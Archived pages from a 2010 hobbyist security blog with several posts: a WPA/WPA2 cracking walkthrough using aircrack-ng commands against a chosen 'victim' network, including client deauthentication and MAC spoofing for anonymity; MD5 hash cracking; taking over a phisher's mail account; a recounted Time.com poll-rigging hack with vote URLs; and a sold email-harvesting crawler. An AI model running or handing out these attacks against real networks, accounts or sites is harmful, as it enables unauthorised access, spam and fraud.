donderdag 16 december 2010

16-year old Dutch MasterCard DDoSer released!

By Qkyrie, Thursday 16th of December, 16:58


The 16-year old boy of "Zoetermeer", The Netherlands, also known as Jeroenz0r who helped attacking sites of MasterCard and Visa was released. Authorities said it wasn't necessary keeping him any longer in custody.
Jeroenz0r was one of the IRC-Operators in which several hacktivists prepared ddos-attacks on big company-websites. Last Wednesday, several big companies, such as Mastercard, were attacked and offline for some time. The "anonymous" group of hacktivists wanted to protest against the companies' actions to disable the donations for WikiLeaks. After being arrested, Jeroenz0r confessed.

Although he was released, the Dutch Team High Tech Crime is still investigating the DDoS attacks and its origins.

Last Friday, the was summoned. The judge decided to keep him in custody for 13 days, but because they didn't need him anymore, that timespan was shortened.




Gepost door Quinten
0 reacties

Cracking WPA/WPA2 under Linux

background

When going trough a lot of forums, I noticed a strange behaviour. A lot of people were into cracking WEP, but still had a lot of questions on WPA. After these findings, I, @_Qkyrie_,  decided to just write my own tutorial :-)

Knowledge

If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is, some don't agree. The fact is, that if the password is in some sort of dictionary, the password can be cracked. you'll need a 4-way handshake from a client connecting to an AP. The 4way handshake holds an encrypted algorithm which can be cracked by dictionary attack. you'll need a huge list and some luck that the password is in the list, or you can make a personal list created with a password tool of your choice (like john), which will not be discussed in this tutorial ;-).For this tutorial, of course I'll be using the Aircrack-ng suite.

Optional: lazyness

sudo su
you might need root access to run these applications. For example, if you are using Ubuntu and you don't want to type "sudo" in front of every line, you could use this optional command. knowing what interface to use
first of all, you'll have to know what the name of your wireless interface is, thats why you type:
iwconfig
 

Identifying your victim

airmon-ng start interface
you'd get a small message saying: (monitor mode enabled on spoofedinterface ) //In my case, interface was "mon0"..
airodump-ng spoofedinterface
The next step would be choosing your victim. Obviously we would be looking for someone with wpa encryption now. since you want to crack someone with wpa. write down his BSSID and his CHANNEL.




rebooting the network card to fit in the right Channel

airmon-ng stop spoofedinterfacew
airmon-ng start interface CHANNEL
Start the dumping of the file

airodump-ng -c CHANNEL --bssid BSSID -w psk spoofedinterface
this will start airodump-ng on your specific channel (-c). It will search handshakes of the specifief bssid and will write this all to a capture file named psk (-w).
Notice! You might ask yourself, but how do I know when I captured a handshake? -> Well, aircrack thought of that, if you managed to capture a handshake, a message appears in the upper right corner.




Optional!, but very helpful when speeding up the process

So you need to capture a handshake, but the people who are connected of course won't be giving out the handshake, since this event only takes place during authentication. If we could just boot them for a small second off their network, so they could reconnect, that would be perfect!
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID spoofedinterface
This would do 10 "deauthentication" attacks (-0) with the AP being BSSID and client being booted CLIENTBSSID. You can check if a client is connected by looking at your Airodump-ng screen again. If you see on the bottom of that screen that someone is connected to the ESSID of your victim, simply use the STATION BSSID as CLIENTBSSID in this example.
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap
This would crack the actual capture file that was being created by airodump-ng. notice! You can only try to crack when a handshake actually took place. Don't forget, -w needs the path to your wordlist, so remember where you saved it!




Optional security

As a scriptkiddy, you might want to remain a bit anonymous, so here's how you would change your mac.. Try to implement it yourself ;-)
sudo ifconfig spoofedinterface down && sudo macchanger -r interface && sudo macchanger -r spoofedinterface && ifconfig spoofedinterface up
Wordlists

If you ever needed some good wordlists, I suggest checking here first:
wordlists

Follow @_Qkyrie_
Gepost door Quinten
0 reacties

vrijdag 10 december 2010

How to install nessus on Ubuntu

I might have to explain what Nessus really is first..



Nessus is one of the most famous vulnerabilityscanners, here's an extract from their site:

The Nessus® vulnerability scanner is the world-leader in active scanners,
featuring high-speed discovery, configuration auditing, asset profiling,
sensitive data discovery and vulnerability analysis of your security posture.
Nessus scanners can be distributed throughout an entire enterprise, inside DMZs
and across physically separate networks.



Installation


First, you'll have to download nessus and his plugins

    sudo apt-get install nessusd nessus nessus-plugins


Now we're gonna make nessus run defaultly

    sudo ln -s /etc/init.d/nessusd /etc/rc2.d/S20nessusd


Now we're going to startup nessus
    /etc/init.d/nessusd start

Now we're going to add a user

    sudo nessus-adduser

And to be able to scan any host, you just add "default-accept"


Now we'll restart nessus

    /etc/init.d/nessud restart

and now we startup nessus

    sudo nessus
Gepost door Quinten
0 reacties

Barswf - Cracking hashes @ extreme speeds

What is Barswf?

Barswf is a program designed to crack md5 hashes. It combines old with newer CUDA technologies. So, it uses your graphical card and if available, multiple cores to manage the cracking of md5 hashes. 

It's considered one of the fasted cracking methods available.
two chart to prove the point:



 
 
 How to use it


This will be a short tutorial, since everything you need to know can be viewed in the help file that comes with barswf.
BarsWF_CUDA_x32.exe -h 7df9ad761904a6cd0dc1358949977da0 -c a -min_len 2
-h is to specify the hash
-c specifies the the characters. 
0 -> digits
a -> small letters
A -> capitals
~ -> specials characters
-min_len, i think this speaks for itself
-r -> start from a saved file
 
 
  
sources:
Barswf helpfile
download: http://3.14.by/en/md5
Greetz
@_Qkyrie_









Gepost door
Quinten





















0
reacties


















[Tutorial] Beating offline phishers!










first of all I'd like to say this is part 1 of a series of tutorials on how to track down malware or phishers. This was published last year, but due to great interest reuploaded on this blog.



This tutorial will basically show you one of the simplest ways to spot  an offline phisher and to compromise his account or get him removed.

It all started when I saw this...













I figured that this of course was a simple phisher we had to download. 

He  would just need our World of Warcraft password, and the program would  hack for us, inject gold, etc... this smelled phishy, no? :D

so, I decided, let's download this uber hack.. I downloaded it, and decided to take a look.





 

 Note: certainly I didn't run this kind of program on just my computer. I actually used a virtual box and sandbox to keep it from harming my actual files. Never run possible malware on your computer!

   

Ok, it spit out no malware or anything, so it wouldn't be a keylogger, just a simple ftp function in the program, or mailsystem.

That's when I wanted to start up a disassembler, like w32dasm, or Hiew  or something or maybe a hex-editor (bless HexEditor for Ubuntu)

. But  I saw this was most probably a program written in .net, so I started up  our beloved Stringstealer made by JapaBrz, which can be found in our  tools section.

I was a bit lucky, indeed it was written in .net.

So I started to look a bit, how was this build.

Saw the main form, which was named "Hacks". And what function did I find here ? 







  





bingo, no ftp system, just a simple smtp function. 

And we would think it would be impossible to stop him now, since smtp can be sent with any mail account, no password required. 

But  what did he do, he used 2 mail adresses. One of his own to send, and  one to get the accounts. And the password for his to-account, was just  under his email, 13131312..

The phisher didn't know that once I compromised his from-emailadress,  the chain was broken and he wouldn't get any accounts anymore. So at  some time I had 120 wow accounts, but being a White Hat I deleted them,  sorry for you guys ;-).

after that, I warned google about the phisher his main address, and they banned him, this is what they sent me..






so, all and all, very easy to accomplish, and It helps the community, I'm sure a lot of people appreciate such acts ;-). 

tools:

String stealer

optional windows disassembler

sandboxie 


UPDATE:
Added a good program - Acekidd01 gave me the tip, thx ;-) - which is named Red Gate's Reflector.

It's an entirely free .net decompiler (not disassembler, an entire decompiler!).

It can show you the code of the classes and methods, and how everything  relates. It also has a lot of add-ons that can be downloaded.


Links
homepage: Red-Gate's Homepage 

Add-ins: Codeplex - reflector add-ins








Gepost door
Quinten





















1 reacties


















µTorrent - a quicky!



















uTorrent explained

Hi guys, today I'll be showing you what torrents are and how to install and work with uTorrent</p>



What is the BitTorrent Protocol



Because it's probably easier to use an explanation that most of you should understand, I'll give you an extract of 

wiki's explanation



...
BitTorrent is a peer-to-peer file sharing protocol used for 
distributing large amounts of data. BitTorrent is one of the most 
common protocols for transferring large files, and it has been 
estimated that it accounts for approximately 27-55% of all Internet 
traffic (depending on geographical location) as of February 2009.


BitTorrent protocol allows users to distribute large amounts of data 
without putting the level of strain on their computers that would be 
needed for standard Internet hosting. A standard host's servers can 
easily be brought to a halt if extreme levels of simultaneous data flow 
are reached. The protocol works as an alternative data distribution 
method that makes even small computers (e.g. mobile phones) with low 
bandwidth capable of participating in large data transfers.
...

So basically, it's an easy and fast way to share files



uTorrent



uTorrent is seen as one of the best programs for downloading programs through torrents. It certainly is the smallest one ;-)



Installation of uTorrent





First off, go to the uTorrent site and download the client, preferably the most new and stable one.



The installation is fairly easy. You just choose your language and press next a few times to leave everything at defaults values.



Configuration of uTorrent



Well, there isn't a lot you should be configuring for uTorrent. If you use the normal Windows firewall, it'll prompt you to block (deny) or accept the connection. Of course, we'll want to accept the connection. If you use another type of firewall, simply check what port you are using by pressing CTRL+P in the main screen. You then go to connection and remember or write down the port. Simply open the port in your firewall. Also make sure it's opened in your router too.







Optional Configuration: Upload rate!



Sometimes, you're restricted by an upload/download limit by your ISP. In that case, you'll not want to upload too much. You can simply reduce your uploading rate at the preferences screen.

So simply click CTRL+P. Then go to Bandwidth and put a relatively low number next to Maximum Upload Rate. In my example, it's 2







Using uTorrent to download a file



In my example, I thought I would download the new playmate calendar of 2010.



So, I just went to piratebay and downloaded my torrent. The file has a .torrent extension. (Piratebay? -> google it, it's one of the many torrentsites. If you needed a specific file, you can go to piratebay or mininova to download your file, which you can search with the help of their nifty searchboxes)







Always remember, the more seeders a torrentfile has, the faster it will download!





To open the file, I simply doubleclicked it, since I know uTorrent is the only software on my computer that can open torrents.





If it opens up with a question what to download, simply select the files you want and press next.

The file will download now, and you'll see on the mainscreen what is happening. 











After the file is downloaded - read: had reached 100% - you can simply rightclick and click stop to stop uploading.







Finished



If you didn't understand parts of this tutorial, or you still have questions or comments, please, do not hesitate to comment!



If you however did comprehend everything, you can now proudly consider yourself:




A uTorrent User


Thats why I added in 3 userbars for you to use in your signatures


















Gepost door
Quinten





















0
reacties


















ESET - What is?











Brief History



ESET is a security company, located at Bratislava, Slovakia. In 1992 Anton Zajac, a theoretical physicist with programming as his primary research tool, founded ESET with his colleagues Maros Grund, Rudolf Hruby, Richard Marko, Peter Pasko and Miroslav Trnka.
ESET has several branches and partners all over the world[1]. The company employs roughly about 200 people.



Products



Anton Zajac started the company at the times that worms and viruses were invented and deployed. It was the Michelangelo worm that started him thinking about antivirus software. Therefore, the first project that the team created was NOD, antivirus software that ran on MS-DOS. After a few years, they changed the name to NOD32. For legal reasons, they then changed the name to NOD32 Antivirus.
During the years, they decided to create and deploy a second product. It was – and still is – a combination of NOD32 Antivirus with antispam and firewall functions. They named it “ESET Smart Security”.



Market Share



We’re not going to lie. When talking about Antivirus Software, there are a lot of competing companies. In Germany, Panda is used the most, in Eastern and Central Europe it’s Kaspersky.  Although, with roughly 150 000 users in 160 countries, ESET has a market share of 9%.
ESET has had a nice growth over the years. It has had tremendous gains. In 2006, their revenue was about $33,6 million. In 2009 they had a revenue of $111.4 million, which is a growth of roughly 228 percent. At the end of this year, ESET is estimating a growth of more than 50% and a market share of about 10%.



Organizational Chart



To understand just how big ESET really is, an organizational chart helps a lot. ESET has one Chief Executive Officer, Anton Zajac, one of the founders of ESET. The company is divided in two parts, a headquarter in Eastern Europe, and one in America. There are quite some people who have an executing function. You can all see them on the organizational chart. What will probably strike you, is that almost all of the founders are still occupied in the company. 





European Headquarters - ESET, spol. s.r.o.






 



North American Headquarters - ESET, LLC.









Gepost door
Quinten





















0
reacties


















Marblecake, also the game











Inside the precision hack
There’s  a scene toward the end of the book Contact by Carl Sagan, where the  protagonist Ellie Arroway finds a Message embedded deep in the digits of  PI.  The Message is perhaps an artifact of an extremely advanced  intelligence that apparently manipulated one of the fundamental  constants of the universe as a testament to their power as they wove  space and time.    I’m reminded of this scene by the Time.com 100 Poll  where millions have voted on who are the world’s most influential people  in government, science, technology and the arts. Just as Ellie found a  Message embedded in PI, we find a Message embedded in the results of  this poll.  Looking at the first letters of each of the top 21 leading  names in the poll we find the message “marblecake, also the game”.   The  poll announces (perhaps subtly) to the world, that the most influential  are not the Obamas, Britneys or the Rick Warrens of the world, the most  influential are an extremely advanced intelligence: the hackers.

kg9kl

At 4AM this morning I received an email inviting me to an IRC  chatroom where someone would explain to me exactly how the Time.com 100  Poll was precision hacked.  Naturally, I was a bit suspicious. Anyone  could claim to be responsible for the hack – but I ventured onto the IRC  channel (feeling a bit like a Woodward or Bernstein meeting Deep Throat  in a parking garage).  After talking to ‘Zombocom’ (not his real nick)  for a few minutes, it was clear that Zombocom was a key player in the  hack.  He explained how it all works.



The Beginning 

Zombocom told me that it all started out when the folks that hang out  on the random board of 4chan (sometimes known as /b/) became aware that  Time.com had enlisted moot (the founder of 4chan) as one of the  candidates in the Time.com 100 poll.  A little investigation showed that  a poll vote could be submitted just by doing an HTTP get on the URL:




       http://www.timepolls.com/contentpolls/Vote.do
          ?pollName=time100_2009&id=1883924&rating=1
 
where ID is a number associated with the person being voted for (in this case 1883924 is Rain’s ID).

Soon afterward, several people crafted ‘autovoters’ that would use  the simple voting URL protocol to vote for moot.  These simple  autovoters could be triggered by an easily embeddable ‘spam URL’. The  autovoters were very flexible allowing the rating to be set for any poll  candidate.  For example, the URL


               http://fun.qinip.com/gen.php?id=1883924
                     &rating=1&amount=160
could be used to push 160 ratings of 1 (the worst rating) for the artist Rain to the Time.com poll.

In early stages of the poll, Time.com didn’t have any authentication  or validation – the door was wide open to any client that wanted to  stuff the ballot box.  Soon these autovoting spam urls were sprinkled  around the web voting up moot.  If you were a fan of Rain, it is likely  that when you visited a Rain forum, you were really voting for moot via  one of these spam urls.

Soon afterward, it was discovered that the Time.com Poll didn’t even  range check its parameters to ensure that the ratings fell within the 1  to 100 range.  The autovoters were adapted to take advantage of this  loophole, which resulted in the Time.com poll showing moot with a 300%  rating, while all other candidates had ratings far below zero.  Time.com  apparently noticed this and intervened by eliminating millions of votes  for moot and restoring the poll to a previous state (presumably) from a  backup.  Shortly afterward, Time.com changed the protocol to attempt to  authenticate votes by  requiring  that a key be appended to the poll  submission URL that consisted of an MD5 hash of the URL + a secret word  (AKA ‘the salt’).

“Needless to say, we were enraged” says Zombocom.  /b/ responded by  getting organized – they created an IRC channel (#time_vote) devoted to  the hack, and started to recruit.  Shortly afterward, one of the members  discovered that the ‘salt’, the key to authenticating requests, was  poorly hidden in Time.com’s voting flash application and could be  extracted.  With the salt in hand – the autovoters were back online,  rocking the vote.

Another challenge faced by the autovoters was that if you voted for  the same person more often than once every 13 seconds, your IP would be  banned from voting.  However, it was noticed that you could cycle  through votes for other candidates during those 13 seconds.  The  autovoters quickly adapted to take advantage of this loophole  interleaving up-votes for moot with down-votes for the competition  ensuring that no candidate received a vote more frequently than once  every 13 seconds, while maximizing the voting leverage.



One of the first autovoters was MOOTHATTAN.   This is a simple moot up-voter that will vote for moot about 100 times  per minute.  (Warning, just by visiting that site, you’ll invoke the  autovoter – so if you don’t want to hack the vote, you should probably  skip the visit).

moothatten11

Here’s a screenshot of another autovoter, a program called Mooter, developed by rdn:

mooter

Mooter is a Delphi app  (windows only) that can submit about 300 votes per minute from a single  IP address.  It will also take advantage of any proxies and cycle  through them so that the votes appear to be coming from multiple IP  addresses.  rdn, the author of Mooter, has used Mooter to submit 20  thousand votes in a single 15 minute period.  In the last two weeks,  (when rdn started keeping track) Mooter alone has submitted 10,000,000  votes (about 3.3% of the total number of poll votes).

From the screenshot you can see that Mooter is quite a sophisticated  application.  It allows fine grained control over who receives votes,  what type of rating they get, voting frequency, the proxy cycle, along  with charts and graphs showing all sorts of nifty data.

In addition to highly configurable autovoting apps, the loose  collective of #time_vote maintains charts and graphs of the various  candidate voting histories. Here’s a voting graph that shows the  per-minute frequency of votes for boxer Manny Pacquiao.

manny-graphMore charts are available for browsing at (the very slow to load) http://fun.qinip.com/mvdc/mootvote.php

So with the charts, graphs, spam URLs and autovoters #time_vote had  things well in hand.  Moot would easily cruise to a victory. Although  they still had some annoying competition, especially from fans of the  boxer Manny Paquoia.  Zombocom says that “it can take upwards of 4.5K  votes a minute to keep Manny in his place”. Despite the Manny problem,  the #time_vote collective had complete dominance of the poll.



The Ultimate Precision Hack



At this point Zombocom was starting to get bored and so he started  fiddling with his voting scripts.  Much to his surprise, he found that  no matter what he did, he was never getting banned by Time.com. Zombocom  suspects that his ban immunity may be because he’s running an ipv6  stack which may be confusing Time.com’s IP blocker.  With no 13 second  rate limit to worry about, he was able to crank out votes as fast as his  computer would let him – about 5,000 votes a minute (and soon he’ll  have a new server online that should give him up to 50,000 votes a  minute.)    With this new found power, Zombocom was able to take the  hack to the next level.



Zombocom joked to one of his friends “it would be funny to troll  Time.com and put us up as most influential, but since we are not  explicitly on the list  we’ll have to spell it out. ” His friend thought  it was impossible.  But two weeks later, “marblecake’ was indeed  spelled out for all to see at the top of the Time.com poll.

So what is the significance of ‘marblecake’? Zombocom says: ” Marblecake was an irc channel where the “Message to Scientology”  video originated. Many believe we are “dead” or only doing hugraids  etc, so I thought it would also be a way of saying : we’re still around  and we don’t just do only “moralfag” stuff .

To actually manipulate the poll, Zombocom wrote two perl scripts. The  first one, auto.pl is pretty simple.  It finds the highest rated person  in the poll that is not in the desired top 21 (recall, there are 21  characters in the Message) and down-votes them (you can view this as  eliminating the riff-raff). The second perl script, the_game.pl is  responsible for maintaining the proper order of the top 21 by inspecting  the rating of a particular person and comparing that rating to what it  should be to maintain the proper order and then up-voting or down-voting  as necessary to get the desired rating. With these two scripts, (less  than 200 lines of perl) Zombocom can put the poll in any order he wants.



Ultimately, this hack involved lots of work and a little bit of luck.   Someone figured out the voting URL protocol. A bunch of folks wrote  various autovoters, which were then used by a thousand or more to stack  the vote in moots favor.  Others, sprinkled the spam urls throughout the  forums tricking  the ‘competition’ into voting for moot.  When Time.com  responded by trying to close the door on the hacks, the loose  collective rallied and a member discovered the ‘salt’ that would re-open  the poll to the autovoters. The lucky bit was when Zombocom discovered  that no matter what he did, he wouldn’t get banned. This opened the door  to the fine grained manipulation that led to the embedding of the  Message.



At the core of the hack is the work of a dozen or so, backed by an  army of a thousand who downloaded and ran the autovoters and also backed  by an untold number of others that unwittingly fell prey to the spam  url autovoters.  So why do they do it? Why do they write code, build  complex applications, publish graphs – why do they  organize a team that  is more effective than most startup companies? Says Zombocom: “For the  lulz”.



source: http://musicmachinery.com/2009/04/15/inside-the-precision-hack/








Gepost door
Quinten





















0
reacties












          

        

          

        

donderdag 9 december 2010


          

        







[Dutch] Paper on open wireless networks










Open wireless networks - By Quinten De Swaef







For a schoolassignment we had to write papers on something related to right and IT.

I decided to choose for wireless networks, more specific: Open wireless networks.



In the paper I'll be discussing different kinds of networks, different kinds of protection layers and solutions. The second part will include a digression of different problems when it comes to your rights and duties vs open networks.



For example: Your smartphone automatically connects to an open wireless network. Is this illegal?



Unfortunately, the paper is written in Dutch, and therefore the court orders and decisions are based on Belgian and Dutch laws.



The paper can be downloaded from mediafire








Gepost door
Quinten



















Labels:
,
,
,
,
,
,



0
reacties


















EmailCrawler











What is it?
The Website Crawler was a project we started in  order to master regular expressions. We kept developing and eventually  made an emailcrawler. 
It's being designed with "the three level  crawler" in mind. The three level crawler is a concept we invented to  make sure the user can choose how deep he wants to crawl.
The basic emailcrawler is already finished, but we're waiting for some more optimalisations to release it. 



Three Level Crawler?
EmailcrawlerThe  Three Level Crawler is a concept designed by Qkyrie. It is basically a  way to choose how deep you want to crawl the internet for specific data.  
A level one crawler would only search on the  given websites. Given for example that you have a big list of files. You  can all add them to the program and the program will check those  specific websites for information.
The level two crawler would search on the given  webpage, as well as on all the webpages that are found as links on the  first webpage. This will provide you with a deeper search, and will  guarantee you some more emails. All of this happens concurrently, which  means the speeds are nice, and everything can be followed live.
The level three crawler is a constant crawler.  It keeps searching on the found webpages of a level 2 crawler, and keeps  doing this until a certain amount is found, or until the user chooses  to stop the process.






Free vs Paying?
Yes, fortunately for some of you poor students, there's also a free version!

Of course, to maintain our servers and programming a bit, we added  some nice addons you really would love in the paying version.

There's a way to add an entire file containing webpages that can be crawled. Another add-on we have is an tool to maintain your emaillists. Dedoublers, categories, you think of it, we add it. 

We also will add a way to search on the most famous searchengines (google/bing) for websites with your criteria. 

Emails coming from those websites will be added.



small example



Release!
We finally released the Pro version of our  webcrawler. It has some nice features that won't be available in the  free version (which is not yet released). You can buy it now and a mail  with the program will be sent to you shortly. If you think it takes us  too long to send it to you, feel free to mail us ;-)
Order here!












Gepost door
Quinten



















Labels:
,
,
,



0
reacties












          

        

          

        

woensdag 8 december 2010


          

        







Launch!










Hey everyone,



As of today, 9/12/2010, we wanted to launch this new blog.

This blog will contain a lot of computer related articles and finds.



Most of these will be about new technologies, programming and security.



Get prepared ;)








Gepost door
Quinten



















Labels:
,
,
,
,



0
reacties












        

      









Abonneren op:
Posts (Atom)